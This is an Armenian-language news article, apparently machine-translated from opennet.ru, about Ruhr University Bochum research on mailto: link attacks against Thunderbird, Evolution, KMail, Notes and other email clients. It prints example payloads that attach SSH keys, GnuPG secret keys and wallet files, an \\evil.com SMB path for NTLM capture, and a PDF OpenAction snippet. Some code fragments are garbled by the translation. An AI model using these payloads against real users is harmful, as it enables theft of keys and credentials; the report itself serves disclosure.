Հարձակում էլփոստի հաճախորդների օգտատերերի վրա՝ օգտագործելով «mailto:» հղումները

Ռուրի համալսարանի Բոխումի (Գերմանիա) հետազոտողները վերլուծված (PDF) փոստային հաճախորդների վարքագիծը «mailto:» հղումները մշակելիս առաջադեմ պարամետրերով: Հետազոտված էլփոստի քսան հաճախորդներից հինգը խոցելի էին հարձակման համար, որը շահարկում էր ռեսուրսների փոխարինումը, օգտագործելով «կցել» պարամետրը: Եվս վեց էլփոստի հաճախորդներ խոցելի էին PGP և S/MIME բանալիների փոխարինման հարձակման համար, իսկ երեք հաճախորդներ խոցելի էին գաղտնագրված հաղորդագրությունների բովանդակությունը հանելու համար հարձակման համար:

Հղումներ «mailto:«օգտագործվում են էլփոստի հաճախորդի բացումը ավտոմատացնելու համար՝ հղումում նշված հասցեատիրոջը նամակ գրելու համար: Հասցեից բացի, որպես հղման մաս կարող եք նշել լրացուցիչ պարամետրեր, ինչպիսիք են նամակի թեման և բնորոշ բովանդակության ձևանմուշը: Առաջարկվող հարձակումը շահարկում է «կցել» պարամետրը, որը թույլ է տալիս կցորդել գեներացված հաղորդագրությանը:

Փոստի հաճախորդները Thunderbird-ը, GNOME Evolution-ը (CVE-2020-11879), KDE KMail-ը (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) և Pegasus Mail-ը խոցելի էին չնչին հարձակման նկատմամբ, որը թույլ է տալիս ավտոմատ կերպով կցել: ցանկացած տեղական ֆայլ, որը նշված է «mailto:?attach=path_to_file» հղման միջոցով: Ֆայլը կցվում է առանց նախազգուշացման, ուստի առանց հատուկ ուշադրության օգտատերը կարող է չնկատել, որ նամակը կուղարկվի հավելվածով:

Օրինակ՝ օգտագործելով «mailto:[էլեկտրոնային փոստով պաշտպանված]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" կարող եք GnuPG-ից անձնական բանալիներ տեղադրել տառի մեջ: Կարող եք նաև ուղարկել կրիպտո դրամապանակների (~/.bitcoin/wallet.dat), SSH ստեղների (~/.ssh/id_rsa) և օգտատիրոջը հասանելի ցանկացած ֆայլերի պարունակությունը: Ավելին, Thunderbird-ը թույլ է տալիս դիմակով կցել ֆայլերի խմբեր՝ օգտագործելով այնպիսի կառուցվածքներ, ինչպիսիք են «attach=/tmp/*.txt»:

Ի հավելումն տեղական ֆայլերի, որոշ էլփոստի հաճախորդներ մշակում են հղումներ դեպի ցանցային պահեստ և ուղիներ IMAP սերվերում: Մասնավորապես, IBM Notes-ը թույլ է տալիս ֆայլը փոխանցել ցանցային գրացուցակից՝ «attach=\\evil.com\dummyfile» հղումները մշակելիս, ինչպես նաև ընդհատել NTLM վավերացման պարամետրերը՝ հղում ուղարկելով հարձակվողի կողմից վերահսկվող SMB սերվերին: (հարցը կուղարկվի նույնականացման ընթացիկ պարամետրերի օգտագործողի հետ):

Thunderbird-ը հաջողությամբ մշակում է «attach=imap:///fetch>UID>/INBOX>1/» հարցումները, որոնք թույլ են տալիս կցել բովանդակություն IMAP սերվերի թղթապանակներից: Միևնույն ժամանակ, IMAP-ից գաղտնագրված հաղորդագրությունները, որոնք գաղտնագրված են OpenPGP-ի և S/MIME-ի միջոցով, փոստի հաճախորդի կողմից ավտոմատ կերպով վերծանվում են նախքան ուղարկելը: Thunderbird-ի մշակողները եղել են տեղեկացված խնդրի մասին փետրվարին եւ համարում Thunderbird 78- ը խնդիրն արդեն շտկված է (Thunderbird 52, 60 և 68 մասնաճյուղերը մնում են խոցելի):

Thunderbird-ի հին տարբերակները խոցելի էին նաև հետազոտողների կողմից առաջարկված PGP-ի և S/MIME-ի վրա հարձակման երկու այլ տարբերակների նկատմամբ: Մասնավորապես, Thunderbird-ը, ինչպես նաև OutLook-ը, PostBox-ը, eM Client-ը, MailMate-ը և R2Mail2-ը ենթարկվել են բանալու փոխարինման հարձակման՝ կապված այն բանի հետ, որ փոստային հաճախորդը ավտոմատ կերպով ներմուծում և տեղադրում է S/MIME հաղորդագրություններում փոխանցված նոր վկայագրեր, ինչը թույլ է տալիս. հարձակվողը կազմակերպել օգտատիրոջ կողմից արդեն պահված հանրային բանալիների փոխարինումը:

Երկրորդ գրոհը, որին ենթակա են Thunderbird-ը, PostBox-ը և MailMate-ը, շահարկում է հաղորդագրությունների հաղորդագրության ավտոմատ պահպանման մեխանիզմը և թույլ է տալիս, օգտագործելով mailto պարամետրերը, սկսել գաղտնագրված հաղորդագրությունների վերծանումը կամ կամայական հաղորդագրությունների համար թվային ստորագրության ավելացումը, արդյունքի հետագա փոխանցումը հարձակվողի IMAP սերվերին: Այս հարձակման ժամանակ գաղտնագրված տեքստը փոխանցվում է «body» պարամետրի միջոցով, իսկ «meta refresh» թեգը օգտագործվում է հարձակվողի IMAP սերվերին զանգ սկսելու համար: Օրինակ: ' '

«mailto:» հղումները ավտոմատ կերպով մշակելու համար առանց օգտվողի փոխազդեցության, կարող են օգտագործվել հատուկ մշակված PDF փաստաթղթեր. OpenAction գործողությունը PDF-ում թույլ է տալիս ավտոմատ կերպով գործարկել mailto մշակիչը փաստաթուղթ բացելիս.

%PDF-1.5
1 0 առարկ
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 առարկ
<< /Տեսակ /Գործողություն /S /URI/URI (փոստ՝?body=——ՍԿՍԵԼ PGP հաղորդագրությունը——[…])>>
endobj

Հարձակում էլփոստի հաճախորդների օգտատերերի վրա՝ օգտագործելով «mailto:» հղումները

Source: opennet.ru

Добавить комментарий